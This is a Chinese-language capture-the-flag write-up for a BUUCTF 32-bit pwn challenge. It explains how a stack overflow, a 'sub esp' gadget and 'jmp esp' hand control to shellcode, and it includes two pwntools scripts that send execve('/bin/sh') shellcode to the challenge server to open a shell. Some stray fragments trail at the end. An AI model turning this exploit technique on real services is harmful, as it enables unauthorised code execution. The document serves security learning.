这个题目算是一个很不错的shellcode题,通过控制esp的值指向shellcode,然后有个jmp esp让eip到shellcode上面,最后getshell。
首先看一下文件相关信息:
可以看到,32位程序,并且没有开NX,我最开始做的时候没有注意到这个保护没有开,还想着泄露基址然后system('/bin/sh'),结果卡在缓冲区了,puts输出不了got地址里面的libc函数的地址,导致方法失效,接着来看一下ida里面的伪代码
这里因为没有设置立即回显,所以我们无法利用puts函数来泄露地址获取libc基址,并且没有办法获取栈的地址得到shellcode地址,但是这个题提供了一个非常好的东西!!那就是一个hint
这里可以看到有一个sub esp 24h。然后直接retn,然后后面有一个jmp esp刚好可以让eip跳转到esp的位置。接着就来分析一下这个怎么利用
这里看到这个vul函数的尾部
可以看到有leave retn,这里leave是mov esp ebp。pop ebp的含义
接着画一下这个栈的结构,前面我们知道参数s距离ebp的距离是0x20,那么栈的结构大致是这样的
大概就是长这个样子,之后我们输入覆盖ebp,覆盖返回地址,接着分析这个过程esp的变化,在执行leave指令的时候mov ebp esp,pop ebp。
mov ebp esp将esp指向ebp的位置,然后pop ebp将栈里面原来的ebp弹出来,但是这个ebp已经被我们覆盖了,然后这里pop指令之后esp+4指向了这个返回地址的位置。最后一个ret指令就将这个返回地址弹到eip里面,接着esp加4
这里执行完ret之后,esp刚好是指向ebp+8的位置,也就是参数加上0x28的位置,这里继续看到hint函数
可以看到这里8048500的指令是sub esp, 24h相当于将esp减去0x24,这里如果我们控制返回地址为这个地址,那么最后esp就是指向参数+4的位置,然后接着一个retn指令就是将参数+4位置上的地址当返回地址返回,然后esp加4.最后esp指向参数加8的位置,所以我们的shellcode就可以写在这个参数加8的位置,参数加4的位置写上jmp esp就可以将eip指向shellcode从而实现getshell
最后可以看到shellcode:
from pwn import * r = remote("node5.buuoj.cn", 25646) ret=0x08048503 shellcode = b"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73" shellcode += b"\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0" shellcode += b"\x0b\xcd\x80" hint=0x08048500 #sub epp-0x24 payload=b'\x90'*4+p32(0x08048504)+shellcode+b'a'*(0x20-4-len(shellcode))+p32(hint) r.sendline(payload) r.interactive()这里因为我知道esp的精确位置,所以就可以精准的将返回地址控制到shellcode上面,这里hint地址也可以选那个push的地址,也就是080484FD这个,但是这个push会使得esp的值减4,然后esp就会指向参数+0x24的位置,因为原本esp指向参数加0x28的位置,接着指向减去0x24就会指向参数的位置,然后有个ret指令指向参数加4的位置,所以我们也可以将shellcode放置在参数加4的位置,然后参数位置就是有个jmp esp即可
也附上对应的exp:
from pwn import * r = remote("node5.buuoj.cn", 25646) shellcode = b"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73" shellcode += b"\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0" shellcode += b"\x0b\xcd\x80" hint=0x080484FD #sub epp-0x24 payload=p32(0x08048504)+shellcode+b'a'*(0x20-len(shellcode))+p32(hint) r.sendline(payload) r.interactive()
)
)
 A,B,C,D,E,F1个人题解)